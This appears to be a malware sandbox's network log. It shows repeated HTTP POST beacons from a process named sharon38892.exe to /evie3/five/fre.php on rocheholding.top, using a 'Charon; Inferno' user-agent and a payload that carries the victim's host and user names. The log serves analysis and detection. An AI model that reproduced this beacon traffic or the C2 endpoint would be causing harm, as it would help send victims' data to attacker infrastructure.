May 23, 2024 20:17:52.548186064 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qrsCRxFD5%2Fgb53p65mxpM9hR9vcfS5QBMX1jqIlj6v%2FxuX0JQt5HfQ1sO7wrUMeDp%2Fg80Tvclsx7wtncf5Z68%2Fz3qwCcuqV3qob573eHU4b%2BoB72VQSgQapy9EmuigNo4i7D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b956f041809-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.22	49180	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:52.694695950 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:52.743721008 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:53.329623938 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0CgJEyqZwl4i4wdSfjRtsvTtAiSfF3Fm%2B%2BPJVE1lIJQwiZVTn73tzN8jYx46ar2Li8qoJNkbjOAcEbIx76TBq0%2FL4oKjdy1pTlVp3ZQtXTxHzRFnI5JnnZzUgiPVAkhYEP5F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b9ae9fa0f75-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.22	49181	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:54.073091984 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:54.123891115 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:54.813920021 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FrtQayU4gwdzKIPwrGCc12ylRHWr0U%2BxWSShGCqVDIAuH1T3W%2FMuPD24TwLRESkW1jSBl37KtAZQPHqera6xkMe83OAuBouFZj8DVBh%2BOYK%2Bj83vXbsNFtsk5yQK0X5v%2BbG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870ba389a86a5c-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.22	49182	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:56.049433947 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:56.099731922 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:56.774432898 CEST	621	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUiuMWxHeAZto4vyQJFMuzlG9KIgQCvwDjE59ObOeJsuRbzwUppPmIUvGV36Cj2qb7Nk9OyGOJBBnvbC%2FYsNNjeXnD9gTP6AbN%2FWktDqN1Kls2iEFt2KeVN9GMs6o5xvzIr2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870bafdc730cc6-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.22	49183	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:56.984951973 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:57.037854910 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:57.717241049 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nshdm7%2FxQ7I7mIXk6FeSTRrRBGzlUwPZPUDs3unZIhLlKWMw8EMXYgIcxnAqIVsdLu3ofslmE5Kzb6eqtmp8YQrEk0BS0oq7%2BAVFcCcI5LxMUE2fq%2FXhSNYEfjpE2tFyz5e6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870bb5deac41a9-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.22	49184	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:57.920774937 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:57.972280979 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:58.649785995 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xOEhJ2CCk568%2FPu%2FPGGEqXry9Wim3RpQk7GbOrwVg6Aq9YkvFhh%2B1fZf4d0Amlw7WJBaU%2FyVTTglo6Tn6n4n0Dl4RTxgrniw%2FyY9%2FDrg1MPCnHJCFCdbj2xynDtpezBuHUg3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870bbb8d0c8c75-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.22	49185	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:58.820260048 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:58.871562958 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:59.573703051 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xBSJoX2Librrzm0a%2BUxlDhn6bQ%2B3By5BabGjqbo2XANPq80kju52e8bo4UmzWSGpk2ZbjtcenOqL9ZRbCaqOWptQOvHBMaZLc%2FfUW0JVR0obJwI6%2FXHo46D4qPCokXxIudAq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870bc16b2d7290-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.22	49186	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:59.837093115 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:59.842195034 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:00.570625067 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNgjoQuOUGnRL5nFO4bDamsFLzDEScp85oYd1S1gNj0qmG9Cji%2BMnRnvRC0Wt07TX6%2F%2FRqsOa9OfZGYuf3Pu1f4BQuImdUZTidXbh5DC3KvpkCQDGlwjwNkTdKxmVfm7Uk0k"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870bc71e940c86-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.22	49187	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:00.736741066 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:00.788536072 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:01.358052015 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=daUwx8HMk1pfRE8aVWTKyGpQOJRQCZmOiRTfFhZ3phJT80nOx0pNWMmk9s%2Fkt%2BFC92N3Fcqzlamb1eyt%2FBw207p%2FuC3EkbVXgm%2FPejZKaF25TjiVuLz1uDQYEBH%2F1jxW4QNj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870bcd3c7f7c9c-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.22	49188	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:01.557933092 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:01.607893944 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:02.216253996 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O57ZIRniiINk2qn8yVpk4zNrNDOxLwILjgnk2nfcdKwetwWREc%2F3LjjhJ3zFFjfnyCiluAxXMRoG3H%2B9r%2Bh3qydlBKHwSJ06sLQB3oTOyCd%2FR9%2BRRGeC%2FXLRXxqtN7pGyGqw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870bd25e7b4240-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.22	49189	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:02.368807077 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:02.423894882 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:03.109268904 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ivBvZw8kN5NoHh6PB%2FlCS6hRsGq3H88xBDGx4CZ%2B%2FgldmfFElQXgryjY3OICUSAFB6ZtlptxQsgfgiKbyL9UVJecpEEF%2BA4qQdaMIYJvFcnUokQUfd37Z7Pxgt3I%2B%2FKSYYMS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870bd77a3f42af-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.22	49190	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:03.278749943 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:03.339329004 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:04.014142990 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vAxvFtv%2BY%2BgMFZP%2BCifw8mJ4NxXYcoi8lsm4UlXu20wUYRHqkxJenAggqFNaFgW6h2uQ6zkMtGPKNSFoXWyPoBB1wCmuqp%2BrU8JYjMDBQLKxr8TZqdb44hmYt6w0GIDPO9lo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870bdd1d1cc472-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.22	49191	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:04.176230907 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:04.232033014 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:05.011420012 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BswJSZb%2F%2BsnEOBGmgrIWTkOMCQZR64fnncoBJySwXAt8DE%2BhHHt0Rsvn%2FTpMbhA3ccEzhyQnBKzvcVTXdRI7HdtqBKJTQkHZANnHEOIOfDbd3WKXOuLN5B2OtkfZ%2BOMWzNGc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870be33d9a42be-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.22	49192	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:06.045591116 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:06.103692055 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:06.911864042 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2FtPiQGlrZeEZCC2Ick6y%2F9n1nQg53RLoFhz9ji2GGrKTd%2FjYy2hs58F7q9s1daufuJK04paakMsN6z1V5ZjQhwL0YVPTtQTDgdv1Ji2Dy0xA29mxrm3m2lDl3QySjYFOSgp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870bef2b040f5d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.22	49193	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:07.107765913 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:07.135699987 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:07.833966970 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2j3uyAnduO1LV3k6OKq%2FlpMUPhNGvzz1nNAzWydPoMxf8AivjNL6S1aqUVw8te01ACmTteztf3F%2FKnbGRzhkAuLBNiBRw4I8ri%2BZ27v040YBGmVt15c%2FF6BssEC4wBuDeoA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870bf51ab30f6b-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.22	49194	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:07.989686012 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:08.039657116 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
